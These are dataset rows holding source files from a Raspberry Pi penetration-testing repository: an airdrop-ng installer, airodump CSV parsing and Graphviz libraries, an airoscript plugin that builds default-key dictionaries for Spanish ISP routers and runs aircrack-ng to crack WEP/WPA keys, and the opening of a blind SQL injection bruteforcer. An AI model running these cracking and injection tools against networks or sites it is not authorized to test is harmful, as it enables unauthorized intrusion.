Dataset schema:

column                 type       range / distinct values
id                     int64      0 - 458k
file_name              string     lengths 4 - 119
file_path              string     lengths 14 - 227
content                string     lengths 24 - 9.96M
size                   int64      24 - 9.96M
language               string     1 class
extension              string     14 classes
total_lines            int64      1 - 219k
avg_line_length        float64    2.52 - 4.63M
max_line_length        int64      5 - 9.91M
alphanum_fraction      float64    0 - 1
repo_name              string     lengths 7 - 101
repo_stars             int64      100 - 139k
repo_forks             int64      0 - 26.4k
repo_open_issues       int64      0 - 2.27k
repo_license           string     12 classes
repo_extraction_date   string     433 classes
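A minimal sketch of consuming rows with this schema, assuming the table has been exported as JSON Lines with one object per row (the export format and the file name "code_rows.jsonl" are assumptions, not part of the original dump):

import json

# Each line is one dataset row; "content" holds the full source file,
# "size" its length in bytes, per the schema above.
with open("code_rows.jsonl") as rows:
    for raw in rows:
        row = json.loads(raw)
        print("%s (%s, %d lines) from %s" % (
            row["file_name"], row["language"],
            row["total_lines"], row["repo_name"]))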

id: 18,900
file_name: install.py
file_path: pwnieexpress_raspberry_pwn/src/aircrack-ng-1.2-rc1/scripts/airdrop-ng/old-installers/install.py
content:
#!/usr/bin/env python

__version__ = "1.13.2010.21:00"
__author__ = "Marfi"

'''
This is the installer file for airdrop-ng. It first checks for
different dependancies, such as make, svn, etc.
'''

import os, sys
from shutil import rmtree

if os.geteuid() != 0:
    print "Installer must be root to run. \nPlease 'su' or 'sudo -i' and try again. \nExiting..."
    sys.exit(1)

class checkDepend:
    def __init__(self):
        clear = "\n" * 100
        print clear
        print "Checking for dependancies used by the installer..."
        self.a = 0
        self.deps = ["make", "svn", "tar", "gcc"]
        for depends in self.deps:
            if (os.path.isfile("/usr/bin/" + depends)
                    or os.path.isfile("/usr/sbin/" + depends)
                    or os.path.isfile("/usr/local/bin/" + depends)
                    or os.path.isfile("/usr/local/sbin/" + depends)
                    or os.path.isfile("/bin/" + depends)) == True:
                pass
            else:
                self.a = 1
                print depends + " not installed."
        if self.a == 0:
            print "All dependancies installed! Continuing...\n"
            print "#### NOTE: For Ubuntu based distro's, \npython2.6-dev must be installed. Please \nmake sure it is installed before continuing!\n"
        else:
            print "Please install dependancies. Exiting...\n\n"
            exit()

class installAirdrop:
    def __init__(self):
        print "Welcome to the airdrop-ng installer!\nYou will be prompted for installing\nAirdrop-ng, lorcon, and pylorcon.\n"
        yno = raw_input("Continue with installer? (y/n): ")
        if yno == "y":
            pass
        else:
            print "Fine, be that way. Exiting..."
            exit()
        yno = raw_input("Install airdrop-ng? (y/n): ")
        if yno == "y":
            self.install()
        else:
            print "airdrop-ng not installed. Continuing..."
            pass

    def install(self):
        print "Build exist? "
        if os.path.isdir("build"):
            rmtree("build")  # imported from shutil, or shutil.rmtree()
            print "File exists. Cleaning it..."
            os.mkdir("build")
        else:
            os.mkdir("build")
            print "Didn't exist. Creating..."
        # moves everything to build/. This is to keep everything clean,
        # and not clutter up the directory.
        os.system("cp airdrop-ng build/ && cp -r lib build/ && cp docs/airdrop-ng.1 build/")
        print "Files copied. Now, moving to directory..."
        os.chdir("build")
        if os.path.isdir("/usr/lib/airdrop-ng") == True:
            rmtree("/usr/lib/airdrop-ng")
        print "Moving airdrop-ng to /usr/bin, lib to \n/usr/lib/airdrop-ng, and installing man pages..."
        os.system("cp airdrop-ng /usr/bin/airdrop-ng && cp -r lib /usr/lib/airdrop-ng && cp airdrop-ng.1 /usr/share/man/man1/")
        #os.chdir ("..")
        print "airdrop-ng installed! =)"

class installLorcon:
    def __init__(self):
        yno = raw_input("Would you like to install lorcon? (y/n): ")
        if yno == "y":
            print "Running svn co http://802.11ninja.net/svn/lorcon/branch/lorcon-old. This may take a while..."
            os.system("svn co http://802.11ninja.net/svn/lorcon/branch/lorcon-old")
            os.chdir("lorcon-old")
            os.system("./configure && make && make install")
            print "Creating symlinks..."
            os.system("ln -s /usr/local/lib/liborcon-1.0.0.so /usr/lib")
            os.chdir("..")
        else:
            print "Lorcon wasn't installed. "

class installPylorcon:
    def __init__(self):
        yno = raw_input("Would you like to install pylorcon? (y/n): ")
        if yno == "y":
            import urllib
            urllib.urlretrieve("http://pylorcon.googlecode.com/files/pylorcon-3.tar.bz2", "pylorcon-3.tar.bz2")
            os.system("tar -xvf pylorcon-3.tar.bz2")
            os.chdir("pylorcon")
            os.system("python setup.py install")
            os.chdir("..")

# What actually runs the classes
checkDepend()
installAirdrop()
installLorcon()
installPylorcon()

yno = raw_input("Clean up? (y/n): ")
if yno == "y":
    os.chdir("..")
    if os.path.isdir("build") == True:
        rmtree("build")
print "Operation(s) complete! May the source be with you. =) "
sys.exit()
size: 3,760
language: Python
extension: .py
total_lines: 101
avg_line_length: 34.138614
max_line_length: 230
alphanum_fraction: 0.669508
repo_name: pwnieexpress/raspberry_pwn
repo_stars: 1,024
repo_forks: 184
repo_open_issues: 8
repo_license: GPL-3.0
repo_extraction_date: 9/5/2024, 5:12:22 PM (Europe/Amsterdam)
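The installer above probes a fixed list of directories for each tool. A hedged alternative sketch (not part of airdrop-ng): walking $PATH instead, which also finds tools installed outside the hard-coded locations:

import os

# Return the full path of an executable found on $PATH, or None.
def which(tool):
    for directory in os.environ.get("PATH", "").split(os.pathsep):
        candidate = os.path.join(directory, tool)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

for dep in ["make", "svn", "tar", "gcc"]:
    print(dep + ": " + (which(dep) or "not installed"))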

id: 18,901
file_name: digenpy
file_path: pwnieexpress_raspberry_pwn/src/aircrack-ng-1.2-rc1/scripts/airoscript-ng/src/plugins/digenpy
content:
# Dict generators for airoscript
#DEPENDS: digenpy
# Copyright (C) 2009-2011 David Francos Cuartero

# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

p_menu+=("Crack with dictionary generator");

digenpy_(){
    [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { enc="WPA"; } || { enc="WEP"; }
    [[ "$3" == "crack" ]] && {
        execute "Cracking" crack $AIRCRACK -0 -l $DUMP_PATH/$Host_MAC.key -w $DUMP_PATH/digenpy__dic $DUMP_PATH/$Host_MAC-01.cap
    } || {
        [[ $3 == "conn_crack" ]] && {
            conn_crack && cp $DUMP_PATH/digenpy__dic $DUMP_PATH/$Host_MAC.key || return 1
        } || {
            AUTO=1; QUIET=0;
            digenpy $1 $2 $Host_MAC $Host_SSID $enc > $DUMP_PATH/digenpy__dic;
            markwarn "Dictionary automatically generated present in $DUMP_PATH/digenpy__dic"
            AUTO=0; QUIET="";
        }
    }
}

Telefonica(){
    if [[ "$Host_SSID" =~ WLAN* ]]; then
        avail=1; [[ $test == 1 ]] && return
        digenpy_ Spanish Telefonica
        digenpy_ Spanish Telefonica crack && cracked=1
    fi
}

Jazztel(){
    if [[ "$Host_SSID" =~ JAZZTEL* ]]; then
        avail=1; [[ $test == 1 ]] && return
        [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { min_ivs=10; return; }
        warn $"Encription is" "$Host_ENC"
        digenpy_ Spanish Jazztel
        digenpy_ Spanish Jazztel crack && cracked=1
    fi;
}

TelefonicaWPA(){
    if [[ "$Host_SSID" =~ WLAN* ]]; then
        avail=1; [[ $test == 1 ]] && return
        digenpy_ Spanish TelefonicaWPA
        digenpy_ Spanish TelefonicaWPA conn_crack && cracked=1
    fi
}

JazztelWPA(){
    if [[ "$Host_SSID" =~ JAZZTEL* ]]; then
        avail=1; [[ $test == 1 ]] && return
        [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { min_ivs=10; return; }
        warn $"Encription is" "$Host_ENC"
        digenpy_ Spanish JazztelWPA
        digenpy_ Spanish JazztelWPA conn_crack && cracked=1
    fi;
}

Crack_with_dictionary_generator(){
    if [ "$Host_SSID" == "" ]; then
        $clear; echo -e $"Error: You must select a target first"; return;
    fi
    [[ "${1}" == "get_wpa" ]] && {
        for function in "TelefonicaWPA" "JazztelWPA" ; do
            $function; test=0;
        done
        return
    }
    if [ "$1" == "return_ivs" ]; then
        for function in "Telefonica" "Jazztel" ; do
            test=1; $function; test=0;
            [[ "$avail" == "1" ]] && return 4;
        done
        return 255
    else
        for function in "Telefonica" "Jazztel"; do
            tag
            [[ $QUIET_DIGENPY == 1 ]] || warn "${mark}Trying $function"
            $function
            [[ "$cracked" == "1" ]] && return
        done
        if [ "$1" == "autocrack" ]; then
            export wait_for_execute=1; AUTO=1;
            selectcracking 1;
            AUTO=0; export wait_for_execute=0;
        else
            selectcracking
        fi
    fi
}
size: 3,563
language: Python
extension: .py
total_lines: 91
avg_line_length: 32.626374
max_line_length: 128
alphanum_fraction: 0.569569
repo_name: pwnieexpress/raspberry_pwn
repo_stars: 1,024
repo_forks: 184
repo_open_issues: 8
repo_license: GPL-3.0
repo_extraction_date: 9/5/2024, 5:12:22 PM (Europe/Amsterdam)

id: 18,902
file_name: setup.py
file_path: pwnieexpress_raspberry_pwn/src/aircrack-ng-1.2-rc1/scripts/airgraph-ng/setup.py
content:
#!/usr/bin/env python
# This file is Copyright David Francos Cuartero, licensed under the GPL2 license.

from distutils.core import setup
import os

setup(name='airgraph-ng',
      version='1.1',
      description='Aircrack-ng network grapher',
      author='TheX1le',
      console = [{"script": "airgraph-ng"}],
      url='http://aircrack-ng.org',
      license='GPL2',
      classifiers=[
          'Development Status :: 4 - Beta',
      ],
      packages=['graphviz'],
      scripts=['dump-join', 'airgraph-ng'],
)
size: 526
language: Python
extension: .py
total_lines: 17
avg_line_length: 25.411765
max_line_length: 81
alphanum_fraction: 0.633136
repo_name: pwnieexpress/raspberry_pwn
repo_stars: 1,024
repo_forks: 184
repo_open_issues: 8
repo_license: GPL-3.0
repo_extraction_date: 9/5/2024, 5:12:22 PM (Europe/Amsterdam)

id: 18,903
file_name: lib_Airgraphviz.py
file_path: pwnieexpress_raspberry_pwn/src/aircrack-ng-1.2-rc1/scripts/airgraph-ng/graphviz/lib_Airgraphviz.py
content:
__author__ = 'Ben "TheX1le" Smith'
__email__ = 'thex1le@gmail.com'
__website__= 'http://trac.aircrack-ng.org/browser/trunk/scripts/airgraph-ng/'
__date__ = '03/02/09'
__version__ = ''
__file__ = 'lib_Airgraphviz.py'
__data__ = 'This library supports airgraph-ng'

"""
########################################
#
# Airgraph-ng.py --- Generate Graphs from airodump CSV Files
#
# Copyright (C) 2009 Ben Smith <thex1le[a.t]gmail.com>
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation; version 2.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
#########################################
"""

""" Airgraph-ng Support Library """

import subprocess  # used by dotWrite below

def apColor(Label, APcolorList): #OLDNAME AP_Label_Color
    """
    Inputs a list containing AP information and the AP color information
    Returns a graph object that holds AP information (colors and details)
    TODO: Get sample data for each line?
    """
    APcolor = APcolorList[0]
    fontColor = APcolorList[1]
    graph = ['\t','"',Label[0],'"',
        '[label="',Label[0],
        '\\nEssid: ',Label[1].rstrip('\x00'), #NULL ESSID is equal to binary space, must remove
        '\\nChannel: ',Label[2],
        '\\nEncryption: ',Label[3],
        '\\nNumber of Clients: ','%s' %(Label[4]), #Check to see if this method is actually needed
        '"',' style=filled',
        ' fillcolor="',APcolor,
        '"',' fontcolor="',fontColor,
        '"',' fontsize=7','];\n']
    return graph

def clientColor(mac, color, label=""): #OLDNAME Client_Label_Color
    """
    Creates a label for the client information passed in (mac, color)
    Returns a graph object
    TODO: Pass a label in that may hold additional client data that
    could in turn be written on the client.
    """
    if label == "":
        label = mac
    graph = ['\t','"',mac,'"',' [label="',label,'"',' color="',color,'"',' fontsize=7','];\n']
    return graph

def encryptionColor(enc): #OLDNAME Return_Enc_type
    """
    Take in the encryption used by the AP and return the proper color
    scheme based on that value.
    Returns a list containing the AP fill color and AP font color
    """
    fontColor = "black" #Default Font Color to be used
    if enc == "OPN":
        color = "firebrick2"
    elif enc == "WEP":
        color = "gold2"
    elif enc in ["WPA","WPA2WPA","WPA2","WPAOPN"]:
        color = "green3"
    else: #No AP should ever get to this point as they will either be encrypted or open
        color = "black"
        fontColor = "white"
    APcolorList = (color,fontColor) #OLDNAME colorLS
    return APcolorList

def graphvizLinker(objA, sep, objB): #OLDNAME graphviz_link
    """
    Return a graph object that links 2 objects together.
    Both objects are passed in with a separator
    """
    graph = ['\t','"',objA,'"',sep,'"',objB,'"',';\n']
    return graph

def dotClose(input, footer): #OLDNAME dot_close
    """
    Close the graphviz config file
    Return final output to be written
    """
    input.extend(footer)
    input.append("}")
    output = ''.join(input)
    return output

def dotWrite(data): #OLDNAME dot_write
    """
    Write all the information obtained to a configuration file
    """
    try:
        subprocess.Popen(["rm","-rf","airGconfig.dot"]) #Delete the file if it already exists
    except Exception:
        pass
    file = open('airGconfig.dot','a')
    file.writelines(data)
    file.close()

def subGraph(items, graphName, graphType, tracked, parse): #OLDNAME subgraph
    """
    Create a subgraph based on the incoming values
    TODO: Figure out what this does and clean it up
    """
    subgraph = ['\tsubgraph cluster_',graphType,'{\n\tlabel="',graphName,'" ;\n']
    if parse == "y":
        for line in items:
            clientMAC = line[0]
            probe_req = ', '.join(line[6:])
            for bssid in tracked:
                if clientMAC not in tracked[bssid]: #check to make sure we're not creating a node for a client that has an association already
                    subgraph.extend(['\tnode [label="',clientMAC,' \\nProbe Requests: ',probe_req,'" ] "',clientMAC,'";\n'])
        subgraph.extend(['\t}\n'])
    elif parse == "n":
        subgraph.extend(items)
        subgraph.extend(['\t}\n'])
    return subgraph

###############################################
#                Filter Class                 #
###############################################
#def filter_enc(input,enc):
#    AP = info[1]
#    for key in AP:
#        bssid = AP[key]
#        if bssid[5] != enc:
#            del AP[bssid]
#    return_list = [info[0],AP]
#    return return_list

#encryption type
#number of clients
#OUI
#channel
#beacon rate?
#essid
#speed
#time
#probe requests
#whore mode... search for ANY one wanting to connect
size: 4,782
language: Python
extension: .py
total_lines: 137
avg_line_length: 31.978102
max_line_length: 129
alphanum_fraction: 0.654919
repo_name: pwnieexpress/raspberry_pwn
repo_stars: 1,024
repo_forks: 184
repo_open_issues: 8
repo_license: GPL-3.0
repo_extraction_date: 9/5/2024, 5:12:22 PM (Europe/Amsterdam)
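A hedged usage sketch for the library above (Python 2, matching the source; the AP values are invented for illustration, and it assumes the graphviz package directory is on the import path). apColor and graphvizLinker return lists of string fragments that dotClose later joins into one dot document:

import lib_Airgraphviz as viz

label = ["00:11:22:33:44:55", "HomeNet", "6", "WPA2", 3]
fragments = viz.apColor(label, viz.encryptionColor("WPA2"))
fragments.extend(viz.graphvizLinker("00:11:22:33:44:55", "->", "aa:bb:cc:dd:ee:ff"))
dot = viz.dotClose(["digraph G {\n"], fragments)  # complete dot graph as one string
print dot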

id: 18,904
file_name: libDumpParse.py
file_path: pwnieexpress_raspberry_pwn/src/aircrack-ng-1.2-rc1/scripts/airgraph-ng/graphviz/libDumpParse.py
content:
#!/usr/bin/python
# airodump parsing lib
# returns an array of client and AP information
# part of the airdrop-ng project

from sys import exit as Exit

class airDumpParse:

    def parser(self, file):
        """
        One Function to call to parse a file and return the information
        """
        self.capr = None
        self.NAP = None
        self.NA = None
        self.apDict = None
        self.clientDict = None
        fileOpenResults = self.airDumpOpen(file)
        self.airDumpParse(fileOpenResults)
        self.clientApChannelRelationship()
        return {'NA':self.NA, 'capr':self.capr, 'apDict':self.apDict,
                'clientDict':self.clientDict, 'NAP':self.NAP}

    def airDumpOpen(self, file):
        """
        Takes one argument (the input file) and opens it for reading
        Returns a list full of data
        """
        try:
            openedFile = open(file, "r")
        except IOError:
            print "Error Airodump File", file, "does not exist"
            Exit(1)
        data = openedFile.xreadlines()
        cleanedData = []
        for line in data:
            cleanedData.append(line.rstrip())
        openedFile.close()
        return cleanedData

    def airDumpParse(self, cleanedDump):
        """
        Function takes parsed dump file list and does some more cleaning.
        Returns a list of 2 dictionaries (Clients and APs)
        """
        try: #some very basic error handling to make sure they are loading up the correct file
            try:
                apStart = cleanedDump.index('BSSID, First time seen, Last time seen, Channel, Speed, Privacy, Power, # beacons, # data, LAN IP, ESSID')
            except Exception:
                apStart = cleanedDump.index('BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key')
            del cleanedDump[apStart] #remove the first line of text with the headings
            try:
                stationStart = cleanedDump.index('Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs')
            except Exception:
                stationStart = cleanedDump.index('Station MAC, First time seen, Last time seen, Power, # packets, BSSID, ESSID')
        except Exception:
            print "You seem to have provided an improper input file. Please make sure you are loading an airodump txt file and not a pcap"
            Exit(1)
        del cleanedDump[stationStart] #Remove the heading line
        clientList = cleanedDump[stationStart:] #Splits all client data into its own list
        del cleanedDump[stationStart:] #The remaining list is all of the AP information
        self.apDict = self.apTag(cleanedDump)
        self.clientDict = self.clientTag(clientList)
        return

    def apTag(self, devices):
        """
        Create an AP dictionary with tags of the data type on an incoming list
        """
        dict = {}
        for entry in devices:
            ap = {}
            string_list = entry.split(',')
            #sorry for the clusterfuck but I swear it all makes sense: this is
            #building a dict from our list so we don't have to do position calls later
            if len(string_list) == 15:
                ap = {"bssid":string_list[0].replace(' ',''),
                      "fts":string_list[1],
                      "lts":string_list[2],
                      "channel":string_list[3].replace(' ',''),
                      "speed":string_list[4],
                      "privacy":string_list[5].replace(' ',''),
                      "cipher":string_list[6],
                      "auth":string_list[7],
                      "power":string_list[8],
                      "beacons":string_list[9],
                      "iv":string_list[10],
                      "ip":string_list[11],
                      "id":string_list[12],
                      "essid":string_list[13][1:],
                      "key":string_list[14]}
            elif len(string_list) == 11:
                ap = {"bssid":string_list[0].replace(' ',''),
                      "fts":string_list[1],
                      "lts":string_list[2],
                      "channel":string_list[3].replace(' ',''),
                      "speed":string_list[4],
                      "privacy":string_list[5].replace(' ',''),
                      "power":string_list[6],
                      "beacons":string_list[7],
                      "data":string_list[8],
                      "ip":string_list[9],
                      "essid":string_list[10][1:]}
            if len(ap) != 0:
                dict[string_list[0]] = ap
        return dict

    def clientTag(self, devices):
        """
        Create a client dictionary with tags of the data type on an incoming list
        """
        dict = {}
        for entry in devices:
            client = {}
            string_list = entry.split(',')
            if len(string_list) >= 7:
                client = {"station":string_list[0].replace(' ',''),
                          "fts":string_list[1],
                          "lts":string_list[2],
                          "power":string_list[3],
                          "packets":string_list[4],
                          "bssid":string_list[5].replace(' ',''),
                          "probe":string_list[6:][0:]}
            if len(client) != 0:
                dict[string_list[0]] = client
        return dict

    def clientApChannelRelationship(self):
        """
        parse the dict for the relationships of client to AP;
        in the process also populate lists of unassociated clients
        and of clients talking to APs we can't see
        """
        clients = self.clientDict
        AP = self.apDict
        NA = [] #create a var to keep the not associated clients' macs
        NAP = [] #create a var to keep track of associated clients' macs to APs we can't see
        apCount = {} #count number of APs; dict is faster than list, stored as BSSID:number of essids
        apClient = {} #dict that stores bssid and clients as a nested list
        for key in (clients):
            mac = clients[key] #mac is the MAC address of the client
            if mac["bssid"] != ' (notassociated) ': #one line of our dictionary of clients
                if AP.has_key(mac["bssid"]): # if it is, check to see it's an AP we can see and have info on
                    if apClient.has_key(mac["bssid"]):
                        apClient[mac["bssid"]].extend([key]) #if key exists append new client
                    else:
                        apClient[mac["bssid"]] = [key] #create new key and append the client
                else:
                    NAP.append(key) # stores the clients that are talking to an access point we can't see
            else:
                NA.append(key) #stores the lines of the not associated APs in a list
        self.NAP = NAP
        self.NA = NA
        self.capr = apClient
        return
size: 6,884
language: Python
extension: .py
total_lines: 145
avg_line_length: 34.489655
max_line_length: 189
alphanum_fraction: 0.552722
repo_name: pwnieexpress/raspberry_pwn
repo_stars: 1,024
repo_forks: 184
repo_open_issues: 8
repo_license: GPL-3.0
repo_extraction_date: 9/5/2024, 5:12:22 PM (Europe/Amsterdam)
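A hedged usage sketch for the parser above (Python 2; "dump-01.txt" is a hypothetical airodump-ng text export, and the module is assumed importable). parser() returns one dict bundling APs, clients, and the client-to-AP map built by clientApChannelRelationship():

from libDumpParse import airDumpParse

results = airDumpParse().parser("dump-01.txt")
# "capr" maps each visible AP BSSID to the list of client MACs seen talking to it
for bssid, client_macs in results["capr"].items():
    print bssid, "->", ", ".join(client_macs)
print "unassociated clients:", len(results["NA"])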

id: 18,905
file_name: libOuiParse.py
file_path: pwnieexpress_raspberry_pwn/src/aircrack-ng-1.2-rc1/scripts/airgraph-ng/graphviz/libOuiParse.py
content:
#!/usr/bin/env python

__author__ = 'Ben "TheX1le" Smith, Marfi'
__email__ = 'thex1le@gmail.com'
__website__= ''
__date__ = '04/26/2011'
__version__ = '2011.4.26'
__file__ = 'ouiParse.py'
__data__ = 'a class for dealing with the oui txt file'

"""
########################################
#
# This program and its support programs are free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation; version 2.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
#########################################
"""

import re, urllib, sys, os
import pdb

#this lib is crap and needs to be rewritten -Textile
if os.path.isdir('./support/'):
    path = './support/'
elif os.path.isdir('/usr/local/share/airgraph-ng/'):
    path = '/usr/local/share/airgraph-ng/'
elif os.path.isdir('/usr/share/airgraph-ng/'):
    path = '/usr/share/airgraph-ng/'
else:
    raise Exception("Could not determine path, please, check your installation")

class macOUI_lookup:
    """
    A class for dealing with OUIs and determining device type
    """
    def __init__(self, oui=False):
        """
        generate the two dictionaries and return them
        """
        #a poor fix where if we have no file it tries to download it
        self.ouiTxtUrl = "http://standards.ieee.org/regauth/oui/oui.txt"
        self.ouiTxt = oui
        if not oui or not os.path.isfile(self.ouiTxt):
            self.ouiUpdate()
            self.ouiTxt = path + "oui.txt"
        self.last_error = None
        self.identDeviceDict(path + 'ouiDevice.txt')
        self.identDeviceDictWhacMac(path + 'whatcDB.csv')
        self.ouiRaw = self.ouiOpen(self.ouiTxt)
        self.oui_company = self.ouiParse() #dict where oui's are the keys to company names
        self.company_oui = self.companyParse() #dict where company name is the key to oui's

    def compKeyChk(self, name):
        """
        check for valid company name key
        """
        compMatch = re.compile(name, re.I)
        if self.company_oui.has_key(name):
            return True
        for key in self.company_oui.keys():
            if compMatch.search(key) is not None:
                return True
        return False

    def ouiKeyChk(self, name):
        """
        check for a valid oui prefix
        """
        if self.oui_company.has_key(name):
            return True
        else:
            return False

    def lookup_OUI(self, mac):
        """
        Lookup an oui and return the company name
        """
        if self.ouiKeyChk(mac) is not False:
            return self.oui_company[mac]
        else:
            return False

    def lookup_company(self, companyLst):
        """
        look up a company name and return their OUI's
        """
        oui = []
        if type(companyLst).__name__ == "list":
            for name in companyLst:
                compMatch = re.compile(name, re.I)
                if self.company_oui.has_key(name):
                    oui.extend(self.company_oui[name])
                else:
                    for key in self.company_oui:
                        if compMatch.search(key) is not None:
                            oui.extend(self.company_oui[key])
        elif type(companyLst).__name__ == "str":
            if self.company_oui.has_key(companyLst):
                oui = self.company_oui[companyLst]
            else:
                compMatch = re.compile(companyLst, re.I)
                for key in self.company_oui:
                    if compMatch.search(key) is not None:
                        oui.extend(self.company_oui[key]) #return the oui for that key
        return oui

    def ouiOpen(self, fname, flag='R'):
        """
        open the file and read it in
        flag denotes use of read or readlines
        """
        try:
            ouiFile = open(fname, "r")
            if flag == 'RL':
                text = ouiFile.readlines()
            elif flag == 'R':
                text = ouiFile.read()
            return text
        except IOError:
            return False

    def ouiParse(self):
        """
        generate an oui to company lookup dict
        """
        HexOui = {}
        Hex = re.compile('.*(hex).*') #matches the following example "00-00-00 (hex)\t\tXEROX CORPORATION"
        ouiLines = self.ouiRaw.split("\n\n") #split each company into a list one company per position
        for line in ouiLines:
            if Hex.search(line) != None:
                lineList = Hex.search(line).group().replace("\t"," ").split(" ") #return the matched text and build a list out of it
                HexOui[lineList[0].replace("-",":")] = lineList[2] #build a dict in the format of mac:company name
        return HexOui

    def companyParse(self):
        """
        generate a company to oui lookup dict
        """
        company_oui = {}
        for oui in self.oui_company:
            if company_oui.has_key(self.oui_company[oui][0]):
                company_oui[self.oui_company[oui][0]].append(oui)
            else:
                company_oui[self.oui_company[oui][0]] = [oui]
        return company_oui

    def ouiUpdate(self):
        """
        Grab the oui txt file off the ieee.org website
        """
        try:
            print("Getting OUI file from %s to %s" % (self.ouiTxtUrl, path))
            urllib.urlretrieve(self.ouiTxtUrl, path + "oui.txt")
            print "Completed Successfully"
        except Exception, error:
            print("Could not download file:\n %s\n Exiting airgraph-ng" % (error))
            sys.exit(0)

    def identDeviceDict(self, fname):
        """
        Create two dicts allowing device type lookup
        one for oui to device and one from device to OUI group
        """
        self.ouitodevice = {}
        self.devicetooui = {}
        data = self.ouiOpen(fname, 'RL')
        if data == False:
            self.last_error = "Unable to open lookup file for parsing"
            return False
        for line in data:
            dat = line.strip().split(',')
            self.ouitodevice[dat[1]] = dat[0]
            if dat[0] in self.devicetooui.keys():
                self.devicetooui[dat[0]].append(dat[1])
            else:
                self.devicetooui[dat[0]] = [dat[1]]

    def identDeviceDictWhacMac(self, fname):
        """
        Create two dicts allowing device type lookup from whatmac DB
        one for oui to device and one from the device to OUI group
        """
        self.ouitodeviceWhatmac3 = {}
        self.ouitodeviceWhatmac = {}
        self.devicetoouiWhacmac = {}
        data = self.ouiOpen(fname, 'RL')
        if data == False:
            self.last_error = "Unable to open lookup file for parsing"
            return False
        for line in data:
            dat = line.strip().split(',')
            dat[0] = dat[0].upper()
            self.ouitodeviceWhatmac[dat[0]] = dat[1]
            self.ouitodeviceWhatmac3[dat[0][0:8]] = dat[1] # a db to support the 3 byte lookup from whatmac
            if dat[1] in self.devicetoouiWhacmac.keys():
                self.devicetoouiWhacmac[dat[1]].append(dat[0])
            else:
                self.devicetoouiWhacmac[dat[1]] = [dat[0]]
size: 7,562
language: Python
extension: .py
total_lines: 194
avg_line_length: 29.061856
max_line_length: 106
alphanum_fraction: 0.569803
repo_name: pwnieexpress/raspberry_pwn
repo_stars: 1,024
repo_forks: 184
repo_open_issues: 8
repo_license: GPL-3.0
repo_extraction_date: 9/5/2024, 5:12:22 PM (Europe/Amsterdam)
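A hedged usage sketch (Python 2; module assumed importable). Note the constructor fetches oui.txt from a 2011-era IEEE URL when no local copy exists, so offline use should pass a path to an existing file; "./support/oui.txt" here is a hypothetical location:

from libOuiParse import macOUI_lookup

# Passing an existing oui.txt avoids the network download in __init__.
lookup = macOUI_lookup(oui="./support/oui.txt")
print lookup.lookup_OUI("00:00:00")    # company name for an OUI prefix, or False
print lookup.lookup_company("XEROX")   # list of OUIs whose company matches the name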

id: 18,906
file_name: sqlbrute.py
file_path: pwnieexpress_raspberry_pwn/src/pentest/sqlbrute/sqlbrute.py
content:
#!/bin/sh
''':'
exec python -O -u "$0" ${1+"$@"}
' '''
# SQLBrute - multi threaded blind SQL injection bruteforcer
# By Justin Clarke, justin gdssecurity com
#
# Algorithm inspired by the original by Kerry Rollins
#
# This version does regex based (error/no error) bruteforcing and waitfor delay testing
#
# There is a page documenting how to use this tool at:
# http://www.justinclarke.com/archives/2006/03/sqlbrute.html
#
# Also, a compiled version for Windows (using py2exe) is available if you're having
# problems with SQLBrute (or ensure you are using Python 2.5). It's available at:
# http://www.justinclarke.com/security/sqlbrute.zip
#

Version = "1.0"

# todo
# The (hopefully) final python version - next version is going to be a .NET rewrite, including:

import threading
import Queue
import sys
import getopt
import string
import urllib
import cgi
import time
import re
import urllib2

# Set some globals
sslSupport = True

# see if SSL support is compiled in for urllib2
try:
    import _ssl
except ImportError:
    print "SSL support not installed - https will not be available"
    sslSupport = False

#
# class to manage the threading. No actual stuff is done in here - we pass function names and args
#
# Adapted from Python in a Nutshell (excellent book)
#
class Worker(threading.Thread): # inherits the Thread class
    requestID = 0 # each thread has a request ID so we can match responses

    # constructor - takes two queues as parameters (overrides threading constructor)
    def __init__(self, requestsQueue, resultsQueue, threadNumber, **kwds):
        threading.Thread.__init__(self, **kwds)
        self.setDaemon(1) # run in background
        self.workRequestQueue = requestsQueue
        self.resultQueue = resultsQueue
        self.setName(threadNumber)
        self.start() # start the thread

    # call the function here - pass in the function and parameters
    def performWork(self, callable, *args, **kwds):
        Worker.requestID += 1
        self.workRequestQueue.put((Worker.requestID, callable, args, kwds))
        return Worker.requestID

    def run(self): # override run
        while 1:
            requestID, callable, args, kwds = self.workRequestQueue.get()
            self.resultQueue.put((requestID, callable(*args+(int(self.getName()),), **kwds)))

class sqlbrute:
    # User variables - change if you want
    num = 5 # default number of worker threads
    targeturl = ""
    cookie = ""
    verb = ""
    verbose = 1
    postdata = ""
    table = ""
    cols = ""
    headers = [["User-Agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"]]
    wherecol = ""
    whereval = ""
    dbenum = False # default to enumerating tables from current database
    enumtype = "" # by default, tables will be enumerated from current database
    dbtype = "sqlserver"
    errorregex = ""
    targeturl = ""
    timetrack = time.time()
    timeout = 60 # timeout to wait for responses before exiting tool
    database = "" # database to use (instead of default)
    andor = " OR " # default to "or" mode. either "or" or "and"
                   # specifies this is going to be select * from foo where 1=2 _and_ <exploit string>
    method = "error" # method of testing - error or time based
    outputfile = ""
